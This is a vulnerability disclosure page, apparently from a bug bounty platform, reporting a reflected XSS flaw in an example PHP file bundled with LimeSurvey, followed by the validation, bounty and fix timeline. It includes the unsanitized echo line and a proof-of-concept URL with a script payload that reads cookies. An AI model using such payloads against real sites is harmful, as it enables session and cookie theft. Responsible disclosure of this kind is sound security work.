Reflected XSS in LimeSurvey in limesurvey/limesurvey

Valid

Reported on

Mar 28th 2023

Description

There is a XSS in Lime Survey. The $_GET['keyword'] is not sanitized :

echo $_GET['keyword'];

Proof of Concept

We can read cookie contents : http://localhost/limesurvey/vendor/khaled.alshamaa/ar-php/examples/ar_query.php?keyword=%3Cscript%3Ealert(document.cookie)%3C/script%3E&submit=%D8%A8%D8%AD%D8%AB+%28Go%29&mode=0

Output:

csrftoken=Aj9xpc4O3p8Se553QLJNlhsFTUgJ3cCp; mode=light

Impact

With XSS, the attacker can read cookies and send requests ...

We are processing your report and will contact the limesurvey team within 24 hours. 2 months ago

We have contacted a member of the limesurvey team and are waiting to hear back 2 months ago

Carsten Schmitz modified the Severity from High (8.2) to High (7.9) 2 months ago

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1

Carsten Schmitz validated this vulnerability 2 months ago

peymankf has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Carsten Schmitz marked this as fixed in 5.6.14 with commit d47fe8 2 months ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

This vulnerability is scheduled to go public on Apr 3rd 2023

Carsten Schmitz published this vulnerability 2 months ago

to join this conversation